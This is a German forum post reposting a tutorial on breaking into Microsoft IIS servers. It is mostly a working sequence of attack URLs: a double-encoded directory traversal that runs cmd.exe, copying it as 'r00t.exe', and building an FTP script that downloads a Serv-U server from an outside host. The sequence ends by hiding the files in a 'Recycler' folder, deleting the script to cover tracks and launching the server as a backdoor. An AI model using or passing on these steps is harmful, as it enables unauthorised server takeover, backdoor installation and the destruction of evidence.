[Hacking] Another IIS Hacking Tut

Dieses Thema im Forum "Security Tutorials" wurde erstellt von Dr.Ogen, 25. August 2007 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 25. August 2007
    Another IIS Hacking Tut

    Nabend,
    das Tutorial stammt nicht von mir
    Habe nen paar Threads bzgl IIS gesehen und dachte mir joooo das postet du mal

    Viel Spass

    Code:
    Also erstmal um den befehl an sich zu verstehn, z.b.:

h**p://218.29.50.94//scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\

der befehl besteht aus 2 teilen. 

teil 1: h**p://218.29.50.94//scripts/.%252e/.%252e/winnt/system32/cmd.exe?/ <--- das ist der unicode (das ? heißt das er über die datei "cmd.exe" ausgeführt werden soll)

teil 2: c+dir+c:\ <--- das ist der teil in dem du dem server sagst was er machen soll c = der befehl soll sofort ausgeführt werden
dir+c:\ = der normale DOS befehl
+ = platzhalter (also anstelle von leertaste)

So, nun mal alle befehle mit erklärung hintereinander:

h**p://218.29.50.94//scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\Inetpub\scripts\r00t.exe

bei diesem befehl erstellst du dir dein eigenen unicode, den du dann im späteren verlauf benutzt. Das is nötig da man meißt keine rechte hat auser im ordner C:\inetpub\scripts (zu 90%) und in dem ordner der im unicode ganz vorne steht.


h**p://218.29.50.94/scripts/r00t.exe?/c+mkdir+c:\Recycler\

mit dem befehl erstellst du das verzeichniss c:\recycler (eigentlich klar^^)


h**p://218.29.50.94/scripts/r00t.exe?/c+echo+open+84.235.152.291+21>>C:\Recycler\ftp.vbl
h**p://218.29.50.94/scripts/r00t.exe?/c+echo+user>>C:\Recycler\ftp.vbl
h**p://218.29.50.94/scripts/r00t.exe?/c+echo+pw>>C:\Recycler\ftp.vbl
h**p://218.29.50.94/scripts/r00t.exe?/c+echo+BINARY>>C:\Recycler\ftp.vbl
h**p://218.29.50.94/scripts/r00t.exe?/c+echo+get+serv-u.exe>>C:\Recycler\ftp.vbl
h**p://218.29.50.94/scripts/r00t.exe?/c+echo+get+serv-u.ini>>C:\Recycler\ftp.vbl
h**p://218.29.50.94/scripts/r00t.exe?/c+echo+quit>>C:\Recycler\ftp.vbl

mit den befehlen erstellst du das ftp script (kennst du bestimmt von mssql, fals du das schon mal gehaxxt hast)


h**p://218.29.50.94/scripts/r00t.exe?/c+ftp+-s:C:\Recycler\ftp.vbl

mit dem befehl startest du das ftp script


h**p://218.29.50.94/scripts/r00t.exe?/c+move+C:\inetpub\scripts\serv-u.exe+c:\Recycler\
h**p://218.29.50.94/scripts/r00t.exe?/c+move+C:\inetpub\scripts\serv-u.ini+c:\Recycler\
mit den befehlen bewegst du deine servu.ini u. exe in den ordner c.\recycler


h**p://218.29.50.94/scripts/r00t.exe?/c+del+C:\Recycler\ftp.vbl

mit dem befehl löscht du das ftp script (spurenbeseitigung)


h**p://218.29.50.94/scripts/r00t.exe?/c+dir+c:\Recycler\

mit dem befehl kannst du kontrollieren ob deine servu datein am richtigen ort sind


h**p://218.29.50.94/scripts/r00t.exe?/c+call+c:\Recycler\serv-u.exe

und mit dem befehl startest du deine servu. der server sollte im bestfall jetzt gehaxxt sein^^ und du solltest mit servu und flashfxp connecten können.


securen tust du den server indem du die exe datei am ende des unicodes suchst und löschst^^. geht bei der cmd.exe nicht immer, da man meist im ordner c:\winnt\system32\ keine rechte hat. ien anderer weg wäre user zu dumpen (ka wie das geht).

wenn ihr mal net wisst was schon alles in der ftp.vbl steht, könnt ihr wuch die datei mit dem befehl "type" anzeigen lassen.
    Für Fragen oder Ähnliches stehe ich nicht zur verfügung

    Greets Ogen
     
  3. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.